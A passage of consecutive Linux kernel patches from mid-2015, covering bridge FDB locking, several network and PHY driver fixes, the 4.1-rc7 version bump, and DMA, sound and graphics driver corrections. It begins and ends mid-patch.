Miller --- net/bridge/br_fdb.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/net/bridge/br_fdb.c b/net/bridge/br_fdb.c index 7eacc8ae9779..e0670d7054f9 100644 --- a/net/bridge/br_fdb.c +++ b/net/bridge/br_fdb.c @@ -569,7 +569,7 @@ void br_fdb_update(struct net_bridge *br, struct net_bridge_port *source, fdb_notify(br, fdb, RTM_NEWNEIGH); } } else { - spin_lock_bh(&br->hash_lock); + spin_lock(&br->hash_lock); if (likely(!fdb_find(head, addr, vid))) { fdb = fdb_create(head, source, addr, vid); if (fdb) { @@ -581,7 +581,7 @@ void br_fdb_update(struct net_bridge *br, struct net_bridge_port *source, /* else we lose race and someone else inserts * it first, don't bother updating */ - spin_unlock_bh(&br->hash_lock); + spin_unlock(&br->hash_lock); } } From c4c832f89dc468cf11dc0dd17206bace44526651 Mon Sep 17 00:00:00 2001 From: Nikolay Aleksandrov Date: Sat, 6 Jun 2015 06:49:00 -0700 Subject: [PATCH 762/872] bridge: disable softirqs around br_fdb_update to avoid lockup br_fdb_update() can be called in process context in the following way: br_fdb_add() -> __br_fdb_add() -> br_fdb_update() (if NTF_USE flag is set) so we need to disable softirqs because there are softirq users of the hash_lock. One easy way to reproduce this is to modify the bridge utility to set NTF_USE, enable stp and then set maxageing to a low value so br_fdb_cleanup() is called frequently and then just add new entries in a loop. This happens because br_fdb_cleanup() is called from timer/softirq context. The spin locks in br_fdb_update were _bh before commit f8ae737deea1 ("[BRIDGE]: forwarding remove unneeded preempt and bh diasables") and at the time that commit was correct because br_fdb_update() couldn't be called from process context, but that changed after commit: 292d1398983f ("bridge: add NTF_USE support") Using local_bh_disable/enable around br_fdb_update() allows us to keep using the spin_lock/unlock in br_fdb_update for the fast-path. Signed-off-by: Nikolay Aleksandrov Fixes: 292d1398983f ("bridge: add NTF_USE support") Signed-off-by: David S. Miller --- net/bridge/br_fdb.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/net/bridge/br_fdb.c b/net/bridge/br_fdb.c index e0670d7054f9..659fb96672e4 100644 --- a/net/bridge/br_fdb.c +++ b/net/bridge/br_fdb.c @@ -796,9 +796,11 @@ static int __br_fdb_add(struct ndmsg *ndm, struct net_bridge_port *p, int err = 0; if (ndm->ndm_flags & NTF_USE) { + local_bh_disable(); rcu_read_lock(); br_fdb_update(p->br, p, addr, vid, true); rcu_read_unlock(); + local_bh_enable(); } else { spin_lock_bh(&p->br->hash_lock); err = fdb_add_entry(p, addr, ndm->ndm_state, From 1489bdeeae1a47171926e255956c9fc251db13a0 Mon Sep 17 00:00:00 2001 From: Hauke Mehrtens Date: Sun, 7 Jun 2015 14:11:48 +0200 Subject: [PATCH 763/872] b44: call netif_napi_del() When the driver gets unregistered a call to netif_napi_del() was missing, this all was also missing in the error paths of b44_init_one(). Signed-off-by: Hauke Mehrtens Signed-off-by: David S. 
Miller --- drivers/net/ethernet/broadcom/b44.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/net/ethernet/broadcom/b44.c b/drivers/net/ethernet/broadcom/b44.c index 77363d680532..a3b1c07ae0af 100644 --- a/drivers/net/ethernet/broadcom/b44.c +++ b/drivers/net/ethernet/broadcom/b44.c @@ -2464,6 +2464,7 @@ static int b44_init_one(struct ssb_device *sdev, ssb_bus_may_powerdown(sdev->bus); err_out_free_dev: + netif_napi_del(&bp->napi); free_netdev(dev); out: @@ -2480,6 +2481,7 @@ static void b44_remove_one(struct ssb_device *sdev) b44_unregister_phy_one(bp); ssb_device_disable(sdev, 0); ssb_bus_may_powerdown(sdev->bus); + netif_napi_del(&bp->napi); free_netdev(dev); ssb_pcihost_set_power_state(sdev, PCI_D3hot); ssb_set_drvdata(sdev, NULL); From 7cf7fa529d0b6b514949cc67b39e3ce406c37006 Mon Sep 17 00:00:00 2001 From: Majd Dibbiny Date: Sun, 7 Jun 2015 15:44:23 +0300 Subject: [PATCH 764/872] net/mlx5_core: Fix static checker warnings around system guid query flow Fix static checker warnings in the flow of system guid query. Fixes: 707c4602cda6 ('net/mlx5_core: Add new query HCA vport commands') Signed-off-by: Majd Dibbiny Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx5/core/fw.c | 3 ++- drivers/net/ethernet/mellanox/mlx5/core/vport.c | 2 +- include/linux/mlx5/vport.h | 2 +- 3 files changed, 4 insertions(+), 3 deletions(-) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fw.c b/drivers/net/ethernet/mellanox/mlx5/core/fw.c index ba87442ef776..9335e5ae18cc 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/fw.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/fw.c @@ -35,7 +35,8 @@ #include #include "mlx5_core.h" -int mlx5_cmd_query_adapter(struct mlx5_core_dev *dev, u32 *out, int outlen) +static int mlx5_cmd_query_adapter(struct mlx5_core_dev *dev, u32 *out, + int outlen) { u32 in[MLX5_ST_SZ_DW(query_adapter_in)]; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/vport.c b/drivers/net/ethernet/mellanox/mlx5/core/vport.c index 20150ffa8b16..b94177ebcf3a 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/vport.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/vport.c @@ -307,7 +307,7 @@ int mlx5_query_hca_vport_context(struct mlx5_core_dev *dev, EXPORT_SYMBOL_GPL(mlx5_query_hca_vport_context); int mlx5_query_hca_vport_system_image_guid(struct mlx5_core_dev *dev, - __be64 *sys_image_guid) + u64 *sys_image_guid) { struct mlx5_hca_vport_context *rep; int err; diff --git a/include/linux/mlx5/vport.h b/include/linux/mlx5/vport.h index 67882a834efb..967e0fd06e89 100644 --- a/include/linux/mlx5/vport.h +++ b/include/linux/mlx5/vport.h @@ -48,7 +48,7 @@ int mlx5_query_hca_vport_context(struct mlx5_core_dev *dev, u16 vf_num, struct mlx5_hca_vport_context *rep); int mlx5_query_hca_vport_system_image_guid(struct mlx5_core_dev *dev, - __be64 *sys_image_guid); + u64 *sys_image_guid); int mlx5_query_hca_vport_node_guid(struct mlx5_core_dev *dev, u64 *node_guid); From d4a4f75cd8f29cd9464a5a32e9224a91571d6649 Mon Sep 17 00:00:00 2001 From: Linus Torvalds Date: Sun, 7 Jun 2015 20:23:50 -0700 Subject: [PATCH 765/872] Linux 4.1-rc7 --- Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Makefile b/Makefile index aee7e5cb4c15..40a8b068ac26 100644 --- a/Makefile +++ b/Makefile @@ -1,7 +1,7 @@ VERSION = 4 PATCHLEVEL = 1 SUBLEVEL = 0 -EXTRAVERSION = -rc6 +EXTRAVERSION = -rc7 NAME = Hurr durr I'ma sheep # *DOCUMENTATION* From fb79c066bce8620fae04112b33c55f279b60d3e1 Mon Sep 17 00:00:00 2001 From: Nicholas Mc Guire Date: Sat, 6 Jun 2015 
09:51:51 +0200 Subject: [PATCH 766/872] cosa: use msecs_to_jiffies for conversions API compliance scanning with coccinelle flagged: ./drivers/net/wan/cosa.c:520:2-18: WARNING: timeout (30) seems HZ dependent Numeric constants passed to schedule_timeout() make the effective timeout HZ dependent which makes little sense in a device probe. Fixed up by converting the constant to jiffies with msecs_to_jiffies() Signed-off-by: Nicholas Mc Guire Signed-off-by: David S. Miller --- drivers/net/wan/cosa.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/wan/cosa.c b/drivers/net/wan/cosa.c index bcfa01add7cc..7193b7304fdd 100644 --- a/drivers/net/wan/cosa.c +++ b/drivers/net/wan/cosa.c @@ -517,7 +517,7 @@ static int cosa_probe(int base, int irq, int dma) */ set_current_state(TASK_INTERRUPTIBLE); cosa_putstatus(cosa, SR_TX_INT_ENA); - schedule_timeout(30); + schedule_timeout(msecs_to_jiffies(300)); irq = probe_irq_off(irqs); /* Disable all IRQs from the card */ cosa_putstatus(cosa, 0); From cbab1510afbb140f7a51d996eafc525ac316c667 Mon Sep 17 00:00:00 2001 From: Nicholas Mc Guire Date: Sun, 7 Jun 2015 12:35:46 +0200 Subject: [PATCH 767/872] wan: dscc4: use msecs_to_jiffies for conversions API compliance scanning with coccinelle flagged: ./drivers/net/wan/dscc4.c:1036:1-33: WARNING: timeout (10) seems HZ dependent ./drivers/net/wan/dscc4.c:554:2-34: WARNING: timeout (10) seems HZ dependent ./drivers/net/wan/dscc4.c:599:2-34: WARNING: timeout (10) seems HZ dependent Numeric constants passed to schedule_timeout_*() make the effective timeout HZ dependent which does not seem to be the intent here. Fixed up by converting the constant to jiffies with msecs_to_jiffies(), passing 100ms (assuming HZ==100 in the original code). Signed-off-by: Nicholas Mc Guire Signed-off-by: David S. Miller --- drivers/net/wan/dscc4.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/drivers/net/wan/dscc4.c b/drivers/net/wan/dscc4.c index f76845de7aa8..7a72407208b1 100644 --- a/drivers/net/wan/dscc4.c +++ b/drivers/net/wan/dscc4.c @@ -551,7 +551,7 @@ static int dscc4_wait_ack_cec(struct dscc4_dev_priv *dpriv, msg, i); goto done; } - schedule_timeout_uninterruptible(10); + schedule_timeout_uninterruptible(msecs_to_jiffies(100)); rmb(); } while (++i > 0); netdev_err(dev, "%s timeout\n", msg); @@ -596,7 +596,7 @@ static inline int dscc4_xpr_ack(struct dscc4_dev_priv *dpriv) (dpriv->iqtx[cur] & cpu_to_le32(Xpr))) break; smp_rmb(); - schedule_timeout_uninterruptible(10); + schedule_timeout_uninterruptible(msecs_to_jiffies(100)); } while (++i > 0); return (i >= 0 ) ? i : -EAGAIN; @@ -1033,7 +1033,7 @@ static void dscc4_pci_reset(struct pci_dev *pdev, void __iomem *ioaddr) /* Flush posted writes */ readl(ioaddr + GSTAR); - schedule_timeout_uninterruptible(10); + schedule_timeout_uninterruptible(msecs_to_jiffies(100)); for (i = 0; i < 16; i++) pci_write_config_dword(pdev, i << 2, dscc4_pci_config_store[i]); From f38b24c90528c888915ef6e3bc320bdb30b14cf2 Mon Sep 17 00:00:00 2001 From: Firo Yang Date: Mon, 8 Jun 2015 11:54:51 +0800 Subject: [PATCH 768/872] fib_trie: coding style: Use pointer after check As Alexander Duyck pointed out that: struct tnode { ... struct key_vector kv[1]; } The kv[1] member of struct tnode is an arry that refernced by a null pointer will not crash the system, like this: struct tnode *p = NULL; struct key_vector *kv = p->kv; As such p->kv doesn't actually dereference anything, it is simply a means for getting the offset to the array from the pointer p. 
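As a standalone illustration of that point (plain C, not code from the kernel tree), taking the address of the trailing array member is only pointer arithmetic and emits no load from the pointer:

	#include <stddef.h>

	struct tnode_demo {
		unsigned long pad;
		int kv[1];
	};

	static int *demo_get_kv(struct tnode_demo *p)
	{
		/* equivalent to (int *)((char *)p + offsetof(struct tnode_demo, kv)) */
		return p->kv;
	}
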
This patch make the code more regular to avoid making people feel odd when they look at the code. Signed-off-by: Firo Yang Signed-off-by: David S. Miller --- net/ipv4/fib_trie.c | 21 +++++++++++++-------- 1 file changed, 13 insertions(+), 8 deletions(-) diff --git a/net/ipv4/fib_trie.c b/net/ipv4/fib_trie.c index 01bce1506cd7..3c699c4e90a4 100644 --- a/net/ipv4/fib_trie.c +++ b/net/ipv4/fib_trie.c @@ -325,13 +325,15 @@ static inline void empty_child_dec(struct key_vector *n) static struct key_vector *leaf_new(t_key key, struct fib_alias *fa) { - struct tnode *kv = kmem_cache_alloc(trie_leaf_kmem, GFP_KERNEL); - struct key_vector *l = kv->kv; + struct key_vector *l; + struct tnode *kv; + kv = kmem_cache_alloc(trie_leaf_kmem, GFP_KERNEL); if (!kv) return NULL; /* initialize key vector */ + l = kv->kv; l->key = key; l->pos = 0; l->bits = 0; @@ -346,24 +348,26 @@ static struct key_vector *leaf_new(t_key key, struct fib_alias *fa) static struct key_vector *tnode_new(t_key key, int pos, int bits) { - struct tnode *tnode = tnode_alloc(bits); unsigned int shift = pos + bits; - struct key_vector *tn = tnode->kv; + struct key_vector *tn; + struct tnode *tnode; /* verify bits and pos their msb bits clear and values are valid */ BUG_ON(!bits || (shift > KEYLENGTH)); - pr_debug("AT %p s=%zu %zu\n", tnode, TNODE_SIZE(0), - sizeof(struct key_vector *) << bits); - + tnode = tnode_alloc(bits); if (!tnode) return NULL; + pr_debug("AT %p s=%zu %zu\n", tnode, TNODE_SIZE(0), + sizeof(struct key_vector *) << bits); + if (bits == KEYLENGTH) tnode->full_children = 1; else tnode->empty_children = 1ul << bits; + tn = tnode->kv; tn->key = (shift < KEYLENGTH) ? (key >> shift) << shift : 0; tn->pos = pos; tn->bits = bits; @@ -2054,11 +2058,12 @@ static struct key_vector *fib_trie_get_next(struct fib_trie_iter *iter) static struct key_vector *fib_trie_get_first(struct fib_trie_iter *iter, struct trie *t) { - struct key_vector *n, *pn = t->kv; + struct key_vector *n, *pn; if (!t) return NULL; + pn = t->kv; n = rcu_dereference(pn->tnode[0]); if (!n) return NULL; From 3c9a9f7fb0eee8a29cb64dfbdaef25efed17e22c Mon Sep 17 00:00:00 2001 From: Jaeden Amero Date: Fri, 5 Jun 2015 18:00:24 -0500 Subject: [PATCH 769/872] net/phy: micrel: Be more const correct In a few places in this driver, we weren't using const where we could have. Use const more. In addition, change the arrays of strings in ksz9031_config_init() to be not only const, but also static. Signed-off-by: Jaeden Amero Signed-off-by: David S. 
Miller --- drivers/net/phy/micrel.c | 29 +++++++++++++++-------------- 1 file changed, 15 insertions(+), 14 deletions(-) diff --git a/drivers/net/phy/micrel.c b/drivers/net/phy/micrel.c index ebdc357c5131..59cc5d4df621 100644 --- a/drivers/net/phy/micrel.c +++ b/drivers/net/phy/micrel.c @@ -288,9 +288,10 @@ static int kszphy_config_init(struct phy_device *phydev) } static int ksz9021_load_values_from_of(struct phy_device *phydev, - struct device_node *of_node, u16 reg, - char *field1, char *field2, - char *field3, char *field4) + const struct device_node *of_node, + u16 reg, + const char *field1, const char *field2, + const char *field3, const char *field4) { int val1 = -1; int val2 = -2; @@ -336,8 +337,8 @@ static int ksz9021_load_values_from_of(struct phy_device *phydev, static int ksz9021_config_init(struct phy_device *phydev) { - struct device *dev = &phydev->dev; - struct device_node *of_node = dev->of_node; + const struct device *dev = &phydev->dev; + const struct device_node *of_node = dev->of_node; if (!of_node && dev->parent->of_node) of_node = dev->parent->of_node; @@ -389,9 +390,9 @@ static int ksz9031_extended_read(struct phy_device *phydev, } static int ksz9031_of_load_skew_values(struct phy_device *phydev, - struct device_node *of_node, + const struct device_node *of_node, u16 reg, size_t field_sz, - char *field[], u8 numfields) + const char *field[], u8 numfields) { int val[4] = {-1, -2, -3, -4}; int matches = 0; @@ -427,18 +428,18 @@ static int ksz9031_of_load_skew_values(struct phy_device *phydev, static int ksz9031_config_init(struct phy_device *phydev) { - struct device *dev = &phydev->dev; - struct device_node *of_node = dev->of_node; - char *clk_skews[2] = {"rxc-skew-ps", "txc-skew-ps"}; - char *rx_data_skews[4] = { + const struct device *dev = &phydev->dev; + const struct device_node *of_node = dev->of_node; + static const char *clk_skews[2] = {"rxc-skew-ps", "txc-skew-ps"}; + static const char *rx_data_skews[4] = { "rxd0-skew-ps", "rxd1-skew-ps", "rxd2-skew-ps", "rxd3-skew-ps" }; - char *tx_data_skews[4] = { + static const char *tx_data_skews[4] = { "txd0-skew-ps", "txd1-skew-ps", "txd2-skew-ps", "txd3-skew-ps" }; - char *control_skews[2] = {"txen-skew-ps", "rxdv-skew-ps"}; + static const char *control_skews[2] = {"txen-skew-ps", "rxdv-skew-ps"}; if (!of_node && dev->parent->of_node) of_node = dev->parent->of_node; @@ -519,7 +520,7 @@ ksz9021_wr_mmd_phyreg(struct phy_device *phydev, int ptrad, int devnum, static int kszphy_probe(struct phy_device *phydev) { const struct kszphy_type *type = phydev->drv->driver_data; - struct device_node *np = phydev->dev.of_node; + const struct device_node *np = phydev->dev.of_node; struct kszphy_priv *priv; struct clk *clk; int ret; From ae6c97bb096df970c8e8095fcc84143a01fa02f2 Mon Sep 17 00:00:00 2001 From: Jaeden Amero Date: Fri, 5 Jun 2015 18:00:25 -0500 Subject: [PATCH 770/872] net/phy: micrel: Comment MMD address of extended registers There are some defines for a few pad skew related extended registers. Specify for which MMD Address (dev_addr) they are for. Signed-off-by: Jaeden Amero Signed-off-by: David S. 
Miller --- drivers/net/phy/micrel.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/net/phy/micrel.c b/drivers/net/phy/micrel.c index 59cc5d4df621..f23765ea6f65 100644 --- a/drivers/net/phy/micrel.c +++ b/drivers/net/phy/micrel.c @@ -366,6 +366,7 @@ static int ksz9021_config_init(struct phy_device *phydev) #define KSZ9031_PS_TO_REG 60 /* Extended registers */ +/* MMD Address 0x2 */ #define MII_KSZ9031RN_CONTROL_PAD_SKEW 4 #define MII_KSZ9031RN_RX_DATA_PAD_SKEW 5 #define MII_KSZ9031RN_TX_DATA_PAD_SKEW 6 From 6270e1ae804ae781cdd3cc20eadfa4b6fb090ab7 Mon Sep 17 00:00:00 2001 From: Jaeden Amero Date: Fri, 5 Jun 2015 18:00:26 -0500 Subject: [PATCH 771/872] net/phy: micrel: Center FLP timing at 16ms Link failures have been observed when using the KSZ9031 with HP 1810-8G and HP 1910-8G network switches. Center the FLP timing at 16ms to help avoid intermittent link failures. >From the KSZ9031RNX and KSZ9031MNX data sheets revision 2.2, section "Auto-Negotiation Timing": The KSZ9031[RNX or MNX] Fast Link Pulse (FLP) burst-to-burst transmit timing for Auto-Negotiation defaults to 8ms. IEEE 802.3 Standard specifies this timing to be 16ms +/-8ms. Some PHY link partners need to receive the FLP with 16ms centered timing; otherwise, there can be intermittent link failures and long link-up times. The PHY data sheet recommends configuring the FLP burst registers after power-up/reset and immediately thereafter restarting auto-negotiation, so we center the FLP timing at 16ms and then restart auto-negotiation in the config_init for KSZ9031. Signed-off-by: Jaeden Amero Signed-off-by: David S. Miller --- drivers/net/phy/micrel.c | 23 ++++++++++++++++++++++- 1 file changed, 22 insertions(+), 1 deletion(-) diff --git a/drivers/net/phy/micrel.c b/drivers/net/phy/micrel.c index f23765ea6f65..499185eaf413 100644 --- a/drivers/net/phy/micrel.c +++ b/drivers/net/phy/micrel.c @@ -366,6 +366,10 @@ static int ksz9021_config_init(struct phy_device *phydev) #define KSZ9031_PS_TO_REG 60 /* Extended registers */ +/* MMD Address 0x0 */ +#define MII_KSZ9031RN_FLP_BURST_TX_LO 3 +#define MII_KSZ9031RN_FLP_BURST_TX_HI 4 + /* MMD Address 0x2 */ #define MII_KSZ9031RN_CONTROL_PAD_SKEW 4 #define MII_KSZ9031RN_RX_DATA_PAD_SKEW 5 @@ -427,6 +431,22 @@ static int ksz9031_of_load_skew_values(struct phy_device *phydev, return ksz9031_extended_write(phydev, OP_DATA, 2, reg, newval); } +static int ksz9031_center_flp_timing(struct phy_device *phydev) +{ + int result; + + /* Center KSZ9031RNX FLP timing at 16ms. 
*/ + result = ksz9031_extended_write(phydev, OP_DATA, 0, + MII_KSZ9031RN_FLP_BURST_TX_HI, 0x0006); + result = ksz9031_extended_write(phydev, OP_DATA, 0, + MII_KSZ9031RN_FLP_BURST_TX_LO, 0x1A80); + + if (result) + return result; + + return genphy_restart_aneg(phydev); +} + static int ksz9031_config_init(struct phy_device *phydev) { const struct device *dev = &phydev->dev; @@ -462,7 +482,8 @@ static int ksz9031_config_init(struct phy_device *phydev) MII_KSZ9031RN_TX_DATA_PAD_SKEW, 4, tx_data_skews, 4); } - return 0; + + return ksz9031_center_flp_timing(phydev); } #define KSZ8873MLL_GLOBAL_CONTROL_4 0x06 From febe06962ab191db50e633a0f79d9fb89a2d1078 Mon Sep 17 00:00:00 2001 From: Axel Lin Date: Sun, 7 Jun 2015 21:33:29 +0800 Subject: [PATCH 772/872] irqchip: sunxi-nmi: Fix off-by-one error in irq iterator Fixes: 6058bb362818 'ARM: sun7i/sun6i: irqchip: Add irqchip driver for NMI controller' Signed-off-by: Axel Lin Cc: Maxime Ripard Cc: Carlo Caione Cc: Jason Cooper Cc: stable@vger.kernel.org Link: http://lkml.kernel.org/r/1433684009.9134.1.camel@ingics.com Signed-off-by: Thomas Gleixner --- drivers/irqchip/irq-sunxi-nmi.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/irqchip/irq-sunxi-nmi.c b/drivers/irqchip/irq-sunxi-nmi.c index 4a9ce5b50c5b..6b2b582433bd 100644 --- a/drivers/irqchip/irq-sunxi-nmi.c +++ b/drivers/irqchip/irq-sunxi-nmi.c @@ -104,7 +104,7 @@ static int sunxi_sc_nmi_set_type(struct irq_data *data, unsigned int flow_type) irqd_set_trigger_type(data, flow_type); irq_setup_alt_chip(data, flow_type); - for (i = 0; i <= gc->num_ct; i++, ct++) + for (i = 0; i < gc->num_ct; i++, ct++) if (ct->type & flow_type) ctrl_off = ct->regs.type; From 4710f2facb5c68d629015747bd09b37203e0d137 Mon Sep 17 00:00:00 2001 From: Aaro Koskinen Date: Mon, 8 Jun 2015 11:32:43 +0300 Subject: [PATCH 773/872] pata_octeon_cf: fix broken build MODULE_DEVICE_TABLE is referring to wrong driver's table and breaks the build. Fix that. 
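For reference, the expected pairing looks like this (a generic sketch with a made-up compatible string, not the octeon driver itself); the second argument of MODULE_DEVICE_TABLE() must name a table that actually exists in the file:

	#include <linux/mod_devicetable.h>
	#include <linux/module.h>
	#include <linux/of.h>

	static const struct of_device_id demo_match[] = {
		{ .compatible = "vendor,demo-device" },
		{ /* sentinel */ },
	};
	MODULE_DEVICE_TABLE(of, demo_match);	/* must match the table defined above */
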
Cc: stable@vger.kernel.org Signed-off-by: Aaro Koskinen Signed-off-by: Tejun Heo --- drivers/ata/pata_octeon_cf.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/ata/pata_octeon_cf.c b/drivers/ata/pata_octeon_cf.c index 80a80548ad0a..27245957eee3 100644 --- a/drivers/ata/pata_octeon_cf.c +++ b/drivers/ata/pata_octeon_cf.c @@ -1053,7 +1053,7 @@ static struct of_device_id octeon_cf_match[] = { }, {}, }; -MODULE_DEVICE_TABLE(of, octeon_i2c_match); +MODULE_DEVICE_TABLE(of, octeon_cf_match); static struct platform_driver octeon_cf_driver = { .probe = octeon_cf_probe, From 3b7e5c7e36ed4a046bbea6d36c9be9d1d6107ae0 Mon Sep 17 00:00:00 2001 From: Jurgen Kramer Date: Fri, 5 Jun 2015 09:42:49 +0200 Subject: [PATCH 774/872] ALSA: usb-audio: add native DSD support for JLsounds I2SoverUSB This patch adds native DSD support for the XMOS based JLsounds I2SoverUSB board Signed-off-by: Jurgen Kramer Cc: Signed-off-by: Takashi Iwai --- sound/usb/quirks.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c index b8c97d092a47..754e689596a2 100644 --- a/sound/usb/quirks.c +++ b/sound/usb/quirks.c @@ -1267,8 +1267,9 @@ u64 snd_usb_interface_dsd_format_quirks(struct snd_usb_audio *chip, if (fp->altsetting == 2) return SNDRV_PCM_FMTBIT_DSD_U32_BE; break; - /* DIYINHK DSD DXD 384kHz USB to I2S/DSD */ - case USB_ID(0x20b1, 0x2009): + + case USB_ID(0x20b1, 0x2009): /* DIYINHK DSD DXD 384kHz USB to I2S/DSD */ + case USB_ID(0x20b1, 0x2023): /* JLsounds I2SoverUSB */ if (fp->altsetting == 3) return SNDRV_PCM_FMTBIT_DSD_U32_BE; break; From 8ce7da474f3063f57ac446eb428945a9852e102d Mon Sep 17 00:00:00 2001 From: Ander Conselvan de Oliveira Date: Mon, 8 Jun 2015 11:26:30 +0300 Subject: [PATCH 775/872] drm/i915: Properly initialize SDVO analog connectors In the commit below, I missed the connector allocation in the function intel_sdvo_analog_init(), leading to those connectors to have a NULL state pointer. 
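The shape of the problem, as a hypothetical sketch (none of these names are the real i915 helpers): a bare kzalloc() of the wrapper leaves its state pointer NULL, while a dedicated alloc helper sets up both allocations in one place.

	#include <linux/slab.h>

	struct demo_state { int active; };

	struct demo_connector {
		struct demo_state *state;	/* left NULL by a bare kzalloc() */
	};

	static struct demo_connector *demo_connector_alloc(void)
	{
		struct demo_connector *c = kzalloc(sizeof(*c), GFP_KERNEL);

		if (!c)
			return NULL;
		c->state = kzalloc(sizeof(*c->state), GFP_KERNEL);
		if (!c->state) {
			kfree(c);
			return NULL;
		}
		return c;
	}
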
commit 08d9bc920d465bbbbd762cac9383249c19bf69a2 Author: Ander Conselvan de Oliveira Date: Fri Apr 10 10:59:10 2015 +0300 drm/i915: Allocate connector state together with the connectors Reported-by: Stefan Lippers-Hollmann Tested-by: Stefan Lippers-Hollmann Signed-off-by: Ander Conselvan de Oliveira Signed-off-by: Jani Nikula --- drivers/gpu/drm/i915/intel_sdvo.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/gpu/drm/i915/intel_sdvo.c b/drivers/gpu/drm/i915/intel_sdvo.c index e87d2f418de4..987b81f31b0e 100644 --- a/drivers/gpu/drm/i915/intel_sdvo.c +++ b/drivers/gpu/drm/i915/intel_sdvo.c @@ -2550,7 +2550,7 @@ intel_sdvo_analog_init(struct intel_sdvo *intel_sdvo, int device) DRM_DEBUG_KMS("initialising analog device %d\n", device); - intel_sdvo_connector = kzalloc(sizeof(*intel_sdvo_connector), GFP_KERNEL); + intel_sdvo_connector = intel_sdvo_connector_alloc(); if (!intel_sdvo_connector) return false; From 4c374fc7ce944024936a6d9804daec85207d9384 Mon Sep 17 00:00:00 2001 From: Ludovic Desroches Date: Mon, 8 Jun 2015 10:33:14 +0200 Subject: [PATCH 776/872] dmaengine: at_xdmac: lock fixes Using _bh variant for spin locks causes this kind of warning: Starting logging: ------------[ cut here ]------------ WARNING: CPU: 0 PID: 3 at /ssd_drive/linux/kernel/softirq.c:151 __local_bh_enable_ip+0xe8/0xf4() Modules linked in: CPU: 0 PID: 3 Comm: ksoftirqd/0 Not tainted 4.1.0-rc2+ #94 Hardware name: Atmel SAMA5 [] (unwind_backtrace) from [] (show_stack+0x10/0x14) [] (show_stack) from [] (warn_slowpath_common+0x80/0xac) [] (warn_slowpath_common) from [] (warn_slowpath_null+0x1c/0x24) [] (warn_slowpath_null) from [] (__local_bh_enable_ip+0xe8/0xf4) [] (__local_bh_enable_ip) from [] (at_xdmac_device_terminate_all+0xf4/0x100) [] (at_xdmac_device_terminate_all) from [] (atmel_complete_tx_dma+0x34/0xf4) [] (atmel_complete_tx_dma) from [] (at_xdmac_tasklet+0x14c/0x1ac) [] (at_xdmac_tasklet) from [] (tasklet_action+0x68/0xb4) [] (tasklet_action) from [] (__do_softirq+0xfc/0x238) [] (__do_softirq) from [] (run_ksoftirqd+0x28/0x34) [] (run_ksoftirqd) from [] (smpboot_thread_fn+0x138/0x18c) [] (smpboot_thread_fn) from [] (kthread+0xdc/0xf0) [] (kthread) from [] (ret_from_fork+0x14/0x34) ---[ end trace b57b14a99c1d8812 ]--- It comes from the fact that devices can called some code from the DMA controller with irq disabled. _bh variant is not intended to be used in this case since it can enable irqs. Switch to irqsave/irqrestore variant to avoid this situation. 
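The two patterns side by side, as a minimal generic sketch (not the at_xdmac code): the _bh variant unconditionally re-enables softirqs on unlock, which trips the warning above when the caller already runs with interrupts disabled, whereas irqsave/irqrestore saves and restores the caller's interrupt state and is therefore safe in any context.

	#include <linux/spinlock.h>

	static DEFINE_SPINLOCK(demo_lock);

	static void demo_update(void)
	{
		unsigned long flags;

		spin_lock_irqsave(&demo_lock, flags);	/* safe in any context */
		/* ... touch data shared with the tasklet/IRQ path ... */
		spin_unlock_irqrestore(&demo_lock, flags);
	}
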
Signed-off-by: Ludovic Desroches Cc: stable@vger.kernel.org # 4.0 and later Signed-off-by: Vinod Koul --- drivers/dma/at_xdmac.c | 75 ++++++++++++++++++++++++------------------ 1 file changed, 43 insertions(+), 32 deletions(-) diff --git a/drivers/dma/at_xdmac.c b/drivers/dma/at_xdmac.c index 933e4b338459..0dcc9a7a90af 100644 --- a/drivers/dma/at_xdmac.c +++ b/drivers/dma/at_xdmac.c @@ -415,8 +415,9 @@ static dma_cookie_t at_xdmac_tx_submit(struct dma_async_tx_descriptor *tx) struct at_xdmac_desc *desc = txd_to_at_desc(tx); struct at_xdmac_chan *atchan = to_at_xdmac_chan(tx->chan); dma_cookie_t cookie; + unsigned long irqflags; - spin_lock_bh(&atchan->lock); + spin_lock_irqsave(&atchan->lock, irqflags); cookie = dma_cookie_assign(tx); dev_vdbg(chan2dev(tx->chan), "%s: atchan 0x%p, add desc 0x%p to xfers_list\n", @@ -425,7 +426,7 @@ static dma_cookie_t at_xdmac_tx_submit(struct dma_async_tx_descriptor *tx) if (list_is_singular(&atchan->xfers_list)) at_xdmac_start_xfer(atchan, desc); - spin_unlock_bh(&atchan->lock); + spin_unlock_irqrestore(&atchan->lock, irqflags); return cookie; } @@ -563,6 +564,8 @@ at_xdmac_prep_slave_sg(struct dma_chan *chan, struct scatterlist *sgl, struct scatterlist *sg; int i; unsigned int xfer_size = 0; + unsigned long irqflags; + struct dma_async_tx_descriptor *ret = NULL; if (!sgl) return NULL; @@ -578,7 +581,7 @@ at_xdmac_prep_slave_sg(struct dma_chan *chan, struct scatterlist *sgl, flags); /* Protect dma_sconfig field that can be modified by set_slave_conf. */ - spin_lock_bh(&atchan->lock); + spin_lock_irqsave(&atchan->lock, irqflags); /* Prepare descriptors. */ for_each_sg(sgl, sg, sg_len, i) { @@ -589,8 +592,7 @@ at_xdmac_prep_slave_sg(struct dma_chan *chan, struct scatterlist *sgl, mem = sg_dma_address(sg); if (unlikely(!len)) { dev_err(chan2dev(chan), "sg data length is zero\n"); - spin_unlock_bh(&atchan->lock); - return NULL; + goto 